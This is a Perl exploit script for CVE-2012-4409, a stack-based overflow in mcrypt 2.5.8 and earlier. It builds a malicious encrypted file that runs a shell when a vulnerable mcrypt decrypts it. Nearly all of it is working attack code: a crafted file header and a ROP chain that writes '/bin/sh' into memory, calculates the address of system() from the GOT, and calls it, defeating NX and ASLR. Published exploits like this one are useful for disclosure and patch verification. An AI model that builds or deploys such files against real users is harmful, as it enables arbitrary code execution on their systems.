mcrypt 2.5.8 Stack Based Overflow

                							

                #!/usr/bin/perl
 
# Title          : mcrypt <= 2.5.8 STACK based overflow
# Date           : 23/11/2012
# Exploit Author : Tosh
# CVE            : CVE-2012-4409
# Patch          : http://www.openwall.com/lists/oss-security/2012/09/06/8
# Tested on      : Archlinux 3.6.6-1, without SSP
 
 
# This script exploit a stack based overflow in mcrypt <= 2.5.8.
# It bypass NX and ASLR protections, but no SSP.
 
# This exploit craft a crypted file and arbitrary code may be executed if the file is decrypted with a vulnerable version
# of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c. See the CVE details or the patch for more
# informations.
 
# Payload must be adjusted on others plateforms, here is just a Proof of Concept :)
 
use strict;
use warnings;
 
my $filename = 'fake.nc';
 
my $file;
my $payload;
 
print "[+] Build payload.\n";
$payload = payload();
 
print "[+] Build file.\n";
$file = build_file($payload);
 
print "[+] Writing $filename.\n";
write_file();
 
print "[+] DONE.\n";
 
sub write_file {
    die("[-] Can't open $filename : $!\n") unless(open F, '>', $filename);
    print F $file;
    close F;
}
 
sub build_file {
# magic
    $file .= "\x00m\x03";
 
# flags
    $file .= pack('C', 1 << 6);
 
# algorithm
    $file .= "H\@Ck3d\x00";
 
# keysize
    $file .= pack('S', 0xdead);
 
# mode
    $file .= "h\@cK3d\x00";
 
# keymode
    $file .= "H\@CK3D\x00";
 
# sflags
    $file .= "\xff";
 
# payload
    $file .= $_[0];
     
    return $file;
}
 
sub payload {
    my $saved_eip_off = 0x71;       # Buffer len for overwrite saved EIP
    my $v_local_1     = 0x0805b000; # Local variable 1 overwriten
    my $v_local_2     = 0x08048007; # Local variable 2 overwriten
    my $ret_sled      = 5;          # Offset between saved EIP and local variables
    my $strcpy_plt    = 0x080499f0; # strcpy@plt address
    my $fopen64_got   = 0x0805b1c8; # fopen64 got entry
    my $system_off    = 0xfffd6b30; # fopen64 - system
    my $w_mem         = 0x0805b000; # writable memory, without ASLR
 
    my $pop2_ret      = 0x08055a63; # pop; pop; ret
    my $ret           = 0x0805a5ed; # ret
    my $pop_ebx       = 0x08056186; # pop ebx; ret
    my $pop_edi       = 0x08053460; # pop edi; ret
    my $xchg_eax      = 0x080517a4; # xchg eax, edi; ret
    my $add_eax       = 0x0804dabf; # add eax,[ebx-0x2776e73c]; pop ebx; ret
    my $call_eax      = 0x0804b357; # call eax; leave; ret
 
    my $payload;
 
    $payload .= "A"x$saved_eip_off;
    $payload .= pack('L', $ret) x $ret_sled;
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $v_local_1);
    $payload .= pack('L', $v_local_2);
 
# Copy  "/bin/" in +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x00);
    $payload .= pack('L', 0x08057fc2);
 
# Copy "sh" + "\x00" in +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x05);
    $payload .= pack('L', 0x08048bab);
 
# Calc system() address with fopen64 GOT entry
    $payload .= pack('L', $pop_ebx);
    $payload .= pack('L', $fopen64_got + 0x2776e73c);
 
    $payload .= pack('L', $pop_edi);
    $payload .= pack('L', $system_off);
 
    $payload .= pack('L', $xchg_eax);
 
    $payload .= pack('L', $add_eax);
    $payload .= "HaCk";
 
# Call system("/bin/sh")
    $payload .= pack('L', $call_eax);
    $payload .= pack('L', $w_mem);
 
    die("[-] Payload too long !\n") if(length $payload > 0xfe);
    return $payload;
}


<p>